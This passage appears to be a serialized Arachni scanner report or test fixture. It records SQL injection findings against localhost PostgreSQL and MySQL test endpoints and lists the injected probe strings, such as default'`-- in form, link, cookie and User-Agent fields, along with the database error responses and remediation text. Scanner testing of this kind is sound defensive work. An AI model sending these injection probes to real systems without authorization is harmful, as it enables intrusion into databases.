OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/postgresql/link/flip?input=default
:verification:
:id: ! 'PostgreSQL query failed:'
var: Parameter flip
url: http://localhost:7362/postgresql/link/flip?input=default
injected: ''
id: ! 'PostgreSQL query failed:'
regexp: (?i-mx:PostgreSQL query failed:)
regexp_match: ! 'PostgreSQL query failed:'
elem: link
remarks: {}
method: GET
response: ! '["PostgreSQL query failed:\nsupplied argument is not a valid PostgreSQL
result\npg_query() [:\npg_exec() [:\nPostgreSQL.*ERROR\nWarning stuff pg_ stuff\nvalid
PostgreSQL result\n", nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg1
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzoxMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: cookie2
url: http://localhost:7362/postgresql/cookie/append
elem: cookie
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:PostgreSQL query failed:)
:match: ! 'PostgreSQL query failed:'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: )
:altered: !binary |-
Y29va2llMg==
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2llMg==": cookie value)
:injected: cookie value)
:combo:
!binary "Y29va2llMg==": cookie value)
:action: http://localhost:7362/postgresql/cookie/append
:verification:
:id: ! 'PostgreSQL query failed:'
var: cookie2
url: http://localhost:7362/postgresql/cookie/append
injected: cookie value)
id: ! 'PostgreSQL query failed:'
regexp: (?i-mx:PostgreSQL query failed:)
regexp_match: ! 'PostgreSQL query failed:'
elem: cookie
remarks: {}
method: GET
response: ! 'PostgreSQL query failed:
supplied argument is not a valid PostgreSQL result
pg_query() [:
pg_exec() [:
PostgreSQL.*ERROR
Warning stuff pg_ stuff
valid PostgreSQL result
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value)
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTY5
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzoxMiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/postgresql/cookie/flip
elem: cookie
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:PostgreSQL query failed:)
:match: ! 'PostgreSQL query failed:'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: )
:altered: Parameter flip
:element: cookie
:params: {}
:follow_location: true
:cookies:
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:injected: ''
:combo:
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/postgresql/cookie/flip
:verification:
:id: ! 'PostgreSQL query failed:'
var: Parameter flip
url: http://localhost:7362/postgresql/cookie/flip
injected: ''
id: ! 'PostgreSQL query failed:'
regexp: (?i-mx:PostgreSQL query failed:)
regexp_match: ! 'PostgreSQL query failed:'
elem: cookie
remarks: {}
method: GET
response: ! '[nil, "PostgreSQL query failed:\nsupplied argument is not a valid
PostgreSQL result\npg_query() [:\npg_exec() [:\nPostgreSQL.*ERROR\nWarning stuff
pg_ stuff\nvalid PostgreSQL result\n"]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;)=95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg1
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzoxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: User-Agent
url: http://localhost:7362/postgresql/header/append
elem: header
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:PostgreSQL query failed:)
:match: ! 'PostgreSQL query failed:'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '''`--'
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: arachni_user'`--
:injected: arachni_user'`--
:combo:
User-Agent: arachni_user'`--
:action: http://localhost:7362/postgresql/header/append
:verification:
:id: ! 'PostgreSQL query failed:'
var: User-Agent
url: http://localhost:7362/postgresql/header/append
injected: arachni_user'`--
id: ! 'PostgreSQL query failed:'
regexp: (?i-mx:PostgreSQL query failed:)
regexp_match: ! 'PostgreSQL query failed:'
elem: header
remarks: {}
method: GET
response: ! 'PostgreSQL query failed:
supplied argument is not a valid PostgreSQL result
pg_query() [:
pg_exec() [:
PostgreSQL.*ERROR
Warning stuff pg_ stuff
valid PostgreSQL result
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: arachni_user'`--
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTY5
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzoyMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/postgresql/header/flip
elem: header
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:PostgreSQL query failed:)
:match: ! 'PostgreSQL query failed:'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '''`--'
:altered: Parameter flip
:element: header
:params:
:follow_location: true
:headers:
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:injected: ''
:combo:
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/postgresql/header/flip
:verification:
:id: ! 'PostgreSQL query failed:'
var: Parameter flip
url: http://localhost:7362/postgresql/header/flip
injected: ''
id: ! 'PostgreSQL query failed:'
regexp: (?i-mx:PostgreSQL query failed:)
regexp_match: ! 'PostgreSQL query failed:'
elem: header
remarks: {}
method: GET
response: ! '[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil,
nil, nil, nil, "PostgreSQL query failed:\nsupplied argument is not a valid PostgreSQL
result\npg_query() [:\npg_exec() [:\nPostgreSQL.*ERROR\nWarning stuff pg_ stuff\nvalid
PostgreSQL result\n", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil,
nil, nil, nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
! '''`--': 95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MzMw
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzozMiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: true
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: input
url: http://localhost:7362/mysql/form/append
elem: form
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:supplied argument is not a valid MySQL)
:match: supplied argument is not a valid MySQL
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: ! '''`--'
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": default'`--
:follow_location: true
:injected: default'`--
:combo:
!binary "aW5wdXQ=": default'`--
:action: http://localhost:7362/mysql/form/append
:verification:
:id: supplied argument is not a valid MySQL
var: input
url: http://localhost:7362/mysql/form/append
injected: default'`--
id: supplied argument is not a valid MySQL
regexp: (?i-mx:supplied argument is not a valid MySQL)
regexp_match: supplied argument is not a valid MySQL
elem: form
remarks:
:stuff:
- Blah
- Blah2
method: GET
response: ! 'supplied argument is not a valid MySQL
Column count doesn''t match value count at row
mysql_fetch_array()
on MySQL result index
You have an error in your SQL syntax;
You have an error in your SQL syntax near
MySQL server version for the right syntax to use
[MySQL][ODBC
Column count doesn''t match
Table ''Stuff'' doesn''t exist
SQL syntax stuff MySQL
Warning stuff mysql_
valid MySQL result
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mzg3
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzozNiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/mysql/form/flip
elem: form
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:supplied argument is not a valid MySQL)
:match: supplied argument is not a valid MySQL
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: ! '''`--'
:altered: Parameter flip
:element: form
:params:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:follow_location: true
:injected: ''
:combo:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/mysql/form/flip
:verification:
:id: supplied argument is not a valid MySQL
var: Parameter flip
url: http://localhost:7362/mysql/form/flip
injected: ''
id: supplied argument is not a valid MySQL
regexp: (?i-mx:supplied argument is not a valid MySQL)
regexp_match: supplied argument is not a valid MySQL
elem: form
remarks: {}
method: GET
response: ! '["supplied argument is not a valid MySQL\nColumn count doesn''t match
value count at row\nmysql_fetch_array()\non MySQL result index\nYou have an
error in your SQL syntax;\nYou have an error in your SQL syntax near\nMySQL
server version for the right syntax to use\n[MySQL][ODBC\nColumn count doesn''t
match\nTable ''Stuff'' doesn''t exist\nSQL syntax stuff MySQL\nWarning stuff
mysql_\nvalid MySQL result\n", nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NDA5
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzozNiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: input
url: http://localhost:7362/mysql/link/append?input=default
elem: link
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:supplied argument is not a valid MySQL)
:match: supplied argument is not a valid MySQL
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: ! '''`--'
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": default'`--
:follow_location: true
:injected: default'`--
:combo:
!binary "aW5wdXQ=": default'`--
:action: http://localhost:7362/mysql/link/append?input=default
:verification:
:id: supplied argument is not a valid MySQL
var: input
url: http://localhost:7362/mysql/link/append?input=default
injected: default'`--
id: supplied argument is not a valid MySQL
regexp: (?i-mx:supplied argument is not a valid MySQL)
regexp_match: supplied argument is not a valid MySQL
elem: link
remarks: {}
method: GET
response: ! 'supplied argument is not a valid MySQL
Column count doesn''t match value count at row
mysql_fetch_array()
on MySQL result index
You have an error in your SQL syntax;
You have an error in your SQL syntax near
MySQL server version for the right syntax to use
[MySQL][ODBC
Column count doesn''t match
Table ''Stuff'' doesn''t exist
SQL syntax stuff MySQL
Warning stuff mysql_
valid MySQL result
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mzg3
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzozNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/mysql/link/flip?input=default
elem: link
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
